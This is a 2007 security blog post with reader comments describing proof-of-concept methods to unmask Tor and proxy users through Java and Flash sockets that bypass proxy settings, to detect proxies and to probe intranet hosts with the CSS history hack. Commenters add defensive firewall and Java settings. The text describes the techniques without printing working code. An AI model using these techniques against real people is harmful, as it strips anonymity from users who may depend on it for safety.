De-anonymizing Tor and Detecting Proxies
Okay, whew, I finally got around to building out some demos of some of the things I’ve been talking about and thinking about. I’m not as crazy busy as Jeremiah but I am speaking at the APWG conference, an invite only Malware conference, a local Rotary meeting, the NJ OWASP conference, the SD ISSA conference and the big OWASP/WASC conference in San Jose. So yah, I’m swamped. Don’t expect much posting for a while. But in the mean-time here are two interesting proxy tidbits.
The first is something you may have seen in passing that Jeremiah and I mentioned at our Blackhat conference and our followup podcast. This code (it takes a several seconds to load) uses a piece of JavaScript to instantiate a Java socket call back to the origin site. In doing so it bypasses the proxy settings of the browser, allowing you to de-anonymize people using proxies. It works great for Tor or just about any HTTP proxy that I can think of. Cool stuff.
The next demo is a tiny slice of HTML that simply tries to detect if you are using a HTTP proxy (as an example an Apache proxy using mod_proxy). It works by forceful browsing and then attempting to use the CSS history hack (without JS) to detect if you were able to surf there. By sending the browser to a place that doesn’t exist (http://test/) and creating an error using the %-- trick, I can detect that you were able to visit somewhere that normally can’t exist. Fun!
As a last point, id pointed out to me that we could easily import fierce’s hosts file and quickly enumerate all the possibilities (and probably more) with the JS CSS history hack and possibly get lots of internal address space of anyone who happened to surf intranet sites prior to visiting the hacker’s site. It’s less reliable than port scanning, obviously, but it’s also way less noisy.
That is all.
September 26th, 2007 at 5:02 pm
Nice and inspiring post.
I deferred my bedtime a bit to put up a cross-browser version: http://hackademix.net/2007/09/26/cross-browser-proxy-unmasking/
Rather than turning your JS+Java PoC into a Java Applet (too much easy), I used Flash.
Good night
September 26th, 2007 at 8:49 pm
FWIW, I’ve posted about the Java technique here, before. About five months ago:
http://ha.ckers.org/blog/20070406/iphide-vulnerable-to-utf-7-and-may-be-phishing/#comment-27452
Giorgio Maone - although I haven’t tested it, yet, my suspicion is that your technique won’t work. The Java technique works because Java doesn’t know that you’re going to be sending an HTTP request with the Socket() object. If you used the URL() object it wouldn’t work. Java will use the browsers proxy settings.
Similarly, it’s doubtful that the getURL() Flash technique would work since, presumably, that object can only be used with HTTP requests.
September 27th, 2007 at 12:27 am
yawnmoth:
why didn’t you test my demo, or at least read my code right, before voicing your suspicion?
Well, even if you can’t read ActionScript or Perl, it was also explained in my post: XMLSocket is used to make a direct socket connection with a custom Perl server listening on port 9999, which echoes back the unmasked IP.
getURL() usage is incidental to the technique, as it is used in this demo only to refresh the page with the new info — or, in a “real world scenario” to send back the IP to the HTTP layer allowing the out-of-band Perl server to be kept stateless and as tiny as possible.
September 27th, 2007 at 4:21 am
it does seem to work with anonymizers
i tried this
http://anonymouse.org/cgi-bin/anon-www.cgi/http://ha.ckers.org/weird/tor.cgi
September 27th, 2007 at 6:12 am
Nice post, I love to see TOR going down
September 27th, 2007 at 6:42 am
Giorgio Maone - I stand corrected. I guess I looked at your code too quickly…
September 27th, 2007 at 7:53 am
@yawnmoth:
No problem, you’re welcome.
I also added credits to your demo in my article, since yours is as cross-browser as mine.
September 27th, 2007 at 8:06 am
Achraf - doesn’t work with me on CGI proxies. And why would it? Just because Java’s Socket object ignores the browsers HTTP proxy settings (which is reasonable, as I explained earlier) doesn’t mean Java can’t abide by the browsers “same domain” policies. The reason being that HTTP is an Application layer protocol while TCP (eg. what you use when you initially connect to the domain and before you’ve actually sent any data) is on the Transport layer.
The Transport layer is constant, when using Java’s Socket object - it’s always going to be TCP. What you can change with Java’s Socket object is the Application layer protocol you’re using.
September 27th, 2007 at 8:08 am
Thanks, Giorgio Maone
September 27th, 2007 at 9:53 am
This is why JanusVM and other transparent proxy approaches work so well. It is easier to anonymize applications and there is no side channel leakage when some plugin or browser helper calls out directly instead of using browser proxy settings.
September 27th, 2007 at 12:03 pm
I tried your de-anonymisation and it wouldn’t work with the FF-Addon PhProxy. There is just the Proxy Ip and a IP I didn’t know…
Your current IP is: 72.36.237.90
Your real IP is: 5.0.2.263
… My IP would start like 84.57…
September 27th, 2007 at 3:21 pm
Hm.. The proxy detection trick doesn’t work with Opera - the URL is considered visited even if it doesn’t exist.
September 27th, 2007 at 5:36 pm
How is this different from the similar POC code that HD Moore published 6 months ago?
http://metasploit.com/research/misc/decloak/
September 27th, 2007 at 5:43 pm
sorry, wrong date…..over a year ago.
September 27th, 2007 at 6:31 pm
Giorgio Maone one works on SSH Tunneling. Thanks.
September 28th, 2007 at 5:39 am
Looks like the same thing. RSnake mentioned it over a year ago, as well:
http://ha.ckers.org/blog/20060628/community-cookie-logger/
Makes me wonder if that tool has changed, over time, or if it’s worked the way it does (using the Flash and Java techniques) all this time…
Incidentally, the phpBB modification off of which my stand-alone tool is based off of was released just over a year ago, as well:
http://www.phpbb.com/community/viewtopic.php?t=437712
HD Moore’s thing predates even that, however.
September 28th, 2007 at 6:17 am
@SilentBob:
Minimal differences, in facts. As I stated in my post, plugins used as out-of-band decloak devices are hardly news, and I throw my 5 mins XMLSocket PoC at it just because it was a so low-hanging fruit in the ActionScript API reference (yes, now I see there was something similar in HD Moore’s work as well) .
Apparently some stuff gets “rediscovered” from time to time, maybe because it’s still more or less getting ignored in the mainstream: the point is stressing how much anonymity is hard, and how easy is falling for the dancing pigs.
At any rate, those CSS based trick, even though less effective, do look original in this context.
September 28th, 2007 at 8:06 am
R3d1st - that’s because of the terrible regex that I’m doing. It probably did work, but you have that string (that looks matches the regex) somewhere in your headers. I could have added some unique string to the front of the IP address when I outputted it to make it easier to find in regex, but alas - I was lazy.
SilentBob - the second one is completely different, the first one is basically the same except it doesn’t use an applet. Although I didn’t discover this part (nor did I say I did) - it was just something I had talked about during the speeches so I figured I should make a proof of concept explaining it better by being more demonstrative. I hope that clears it up.
September 28th, 2007 at 7:02 pm
It would be nice if there was someone who had updated tor lists to use like dshield or similar. Tor sucks to use and 99.9% of the use you see from a server or irc admin’s point of view is abuse.
I seen not too long ago a ddos attack all from tor nodes, so someone had figured out how to incorporate tor usage into botnets
Nice article, Im waiting for the day when this can be done auto via http filtering or by firewalls. I think its pretty much safe to say now that 99% of all established irc networks ban tor and most server admins try to keep them banned too.
I know there will be abuse in anythging but the entire concept of tor allows rampant abuse with no consequences. As far as a home user wanting anonymity Ive alweays used findnot, they may not be the best but TOR is painfully slow to browse with and just basically sucks.
October 1st, 2007 at 8:18 am
Hi!
Nice hack folks!
Could you please email me your CGI code to my email to understand how you’ve done this hack?
My email is vlan7(at)bigfoot.com
Thanks!
October 7th, 2007 at 2:15 am
de-anonymizing Tor
The guys from ha.ckers.org web application security lab recently published ways to bypass browser proxies and de-anonymizing tor. Well, nothing really brand new info, but it’s still interesting stuff.
Read the full post.
…
October 16th, 2007 at 8:55 am
what if you do not enable javascript/java
October 17th, 2007 at 6:36 am
Hi, Honey - you are assuming this vulnerability cannot be replicated in Flash - which it most definitely can if Flash is allowed to make socket calls. Also ActiveX controls or other client side applications (PDF, Quicktime, etc…) all have the potential of having this sort of de-anonymization effect if they can make sockets that don’t follow the browser’s proxy settings (this is untested as far as I know).
November 2nd, 2007 at 9:46 am
Since in most cases Javascript is needed to initiate the Java app in the first place, there’s: NoScript http://noscript.net/ for FF. For Flash and Java there are other “fixes.”
But these little workarounds are not new knowledge. They’ve been on Tor’s wiki for a long time: https://www.torproject.org/download.html.en#Warning
No one has ever claimed you can just plug-in Tor and be anonymous. Like everything done right, it takes a little more work than just that!
For those who bash Tor, what’s your problem with it? Tor’s not a bad thing - in fact you should value anything that aids in protecting your privacy… Or maybe you’re someone who aims to breach other’s privacy?
November 3rd, 2007 at 8:32 am
This code doesn’t work with a firewall enabled to block browser direct access. I have XeroBank/Tor network here and even with Noscript disabled, it didn’t reveal my real IP bypassing my firewall rules!!!!
Thanks for this magnificent tip, that will make everyone uses a firewall to prevent their true IP from being revealed.
November 7th, 2007 at 8:56 am
How about users who even doesn’t have java, javascript, flash and other crap enabled/installed. Also paranoid user can block all egress traffic (except from what is needed for Tor to function properly).
Also great deal of Tor users could be detected with simple technique. Simply start tor, let it update it’s router cache (and do this periodically), and get a list of routers:
awk ‘/^router / {print $3}’ ~/.tor/cached-routers* | sort -u
November 8th, 2007 at 12:33 am
Just for the record, the rules required for Tor, while you’re using a browser like XeroBank are the following. You have to apply them to Firefox.exe file, which is placed on XeroBank’s directory:
Where the protocol is TCP
where the direction is Outbound
And where the remote port is HTTP, HTTPS
Block It
HTTP = port 80
HTTPS = port 443
If you do that, even if you’re using Noscript to allow everything to perform that test, your firewall will prevent the browser from leaking your true IP. I checked here and when my firewall was closed, my true IP was indeed disclosed. So, the bottom line is: if you need to prevent such direct connections, you have to set these rules on your firewall. Otherwise, your true IP will be leaked!
There are more rules here:
http://www.wilderssecurity.com/showpost.php?p=1020429&postcount=9
I strongly recommend everyone to see what was explained on this board.
December 1st, 2007 at 8:26 pm
There’s a way to fix this problem (Java leaking your true IP). And you don’t even need a firewall to prevent that. You just have to modify Java Cpanel from Windows and make Java go through the same proxy settings XeroBank is using!
Go to Java Control Panel on Windows, General - Network settings:
Instead of “Use browser settings” you have to leave the option “Use proxy server” selected. Go to Advanced… and fill these forms:
Advanced Network Settings
HTTP: Port: 0
Secure: Port: 0
FTP: Port: 0
Socks: localhost - Port: 9050
Leave this option unmarked:
“Use same proxy server for all protocols” (I think)
I tried that and when I checked both pages, already allowed on Noscript whitelist, they didn’t reveal my true IP!!!!!!!
http://ha.ckers.org/weird/tor.cgi
http://www.frostjedi.com/terra/scrip…php?mode=utf16 (127.0.0.1 - localhost again)
Listen to this!!!!!!!!!!
The first hackers.org link shows my Tor IP twice!!!!!! I checked Outpost blocked entries/log history and there’s no sign of Firefox.exe!!!
We don’t need a firewall to block this attempt! We need to configure Java itself to make connections using proxy settings! How the hell I didn’t see that before?
Regarding Flash, I didn’t checked because it is not installed here by default on my XeroBank. But this is a minor verification, since Flash can be blocked entirely for most sites out there (we can’t say the same thing about Java, much more required, if we don’t allow Java, many sites can’t even work and we don’t have a choice in the end).
And according to what was said to me, Javascript can’t leak anything.
December 4th, 2007 at 8:32 pm
If you use XeroBank free browser, along with Tor network, these are the correct rules to prevent both Java and Flash from leaking your true IP. Also note that Java is different from Flash.
Java has a control panel on Windows who might be modified in order for your to perform only proxy connections. Flash don’t. The minute I have modified Java cpanel, my Tor IP was reported twice, even while I was not using a firewall.
Browser ruleset
First rule - called “Special Rule”
Where the protocol is TCP
Where the direction is Outbound
and Where the remote host is 127.0.0.1 (255.255.255.255)
and where the remote port is 9050
Allow It
The second rule is called “Browser Block Direct Access”:
Where the protocol is TCP
Where the direction is Outbound
Block It
Please, look at the whole explanation on these links, otherwise you will be lost.
Just remember, you don’t need to disable all plugins. You are entitled to run all of them. But you indeed have to configure your firewall to avoid these leakage attempts. If you do that, then, your privacy is safe.
http://outpostfirewall.com/forum/showthread.php?p=162759
http://www.wilderssecurity.com/showthread.php?t=190073
http://www.wilderssecurity.com/showthread.php?p=994629
http://www.wilderssecurity.com/showpost.php?p=384351&postcount=13
http://www.wilderssecurity.com/showthread.php?t=176514
April 2nd, 2008 at 6:15 pm
Nice article, Im waiting for the day when this can be done auto via http filtering or by firewalls. I think its pretty much safe to say now that 99% of all established irc networks ban tor and most server admins try to keep them banned too.
August 18th, 2008 at 10:21 pm
I appreciate all the works & really nice finding.
BUT.
As far as the user is using script blocking, header modifiers & protocol spoofing. HE/SHE is most secure in many ways. It is really tough for any hacker or script kiddies to do any browser or host exploit.
My formula is simple:
USER + BROWSER (privoxy+tor+i2p+adblock+noscript+header_modifier) = SECURE BROWSING
But i prefer Opera (http://www.opera.com), Its more flexible & configurable. and obviously MORE SECURE.
December 16th, 2008 at 12:30 pm
i need proxies ppl to get on myspace
May 11th, 2009 at 4:29 am
hi… i dont know how to enable java when tor enabled. im using firefox 3 browser… i need java to play game.. i already make options in browser to enable java… help needed. any help is greatly appreciate
January 3rd, 2010 at 7:23 pm
The CSS history hack doesn’t work with hidemyass.com, they give each frame an extra unique variable, which blows the hole thing.
Works great with Kproxy though.
Nice job.